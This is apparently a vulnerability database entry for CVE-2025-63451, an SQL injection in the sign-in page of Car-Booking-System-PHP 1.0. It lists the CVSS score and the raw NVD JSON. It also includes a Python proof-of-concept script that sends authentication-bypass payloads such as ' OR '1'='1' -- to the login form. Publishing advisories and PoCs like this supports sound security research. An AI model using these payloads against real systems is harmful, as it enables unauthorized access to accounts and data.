Security Vulnerability Report
中文
CVE-2025-63451 CVSS 9.8 CRITICAL

CVE-2025-63451

Published: 2025-11-03 16:15:38
Last Modified: 2025-11-07 20:47:00

Description

Car-Booking-System-PHP v.1.0 is vulnerable to SQL Injection in /carlux/sign-in.php.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:* - VULNERABLE
Car-Booking-System-PHP v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63451 SQL Injection PoC # Target: Car-Booking-System-PHP v1.0 # Location: /carlux/sign-in.php import requests import sys def test_sql_injection(target_url): """ Test for SQL Injection vulnerability in login form """ login_url = f"{target_url}/carlux/sign-in.php" # Basic SQL injection payloads for authentication bypass payloads = [ "admin' OR '1'='1", "admin' OR '1'='1' --", "admin' OR '1'='1' #", "' OR '1'='1' --", "' OR '1'='1' #", "admin' UNION SELECT 1,2,3--", "' OR 1=1--", ] for payload in payloads: print(f"[*] Testing payload: {payload}") # Try username field injection data = { 'username': payload, 'password': 'anything' } try: response = requests.post(login_url, data=data, timeout=10) # Check for successful login indicators if 'dashboard' in response.text.lower() or 'welcome' in response.text.lower(): print(f"[!] Potential vulnerability found with payload: {payload}") return True except requests.exceptions.RequestException as e: print(f"[!] Request error: {e}") continue print("[*] Basic tests completed. Manual verification recommended.") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://vulnerable-site.com") sys.exit(1) target = sys.argv[1].rstrip('/') test_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63451", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:37.527", "lastModified": "2025-11-07T20:47:00.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Car-Booking-System-PHP v.1.0 is vulnerable to SQL Injection in /carlux/sign-in.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "20E6E810-0009-4D9D-828A-68A38A642BEE"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-12", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}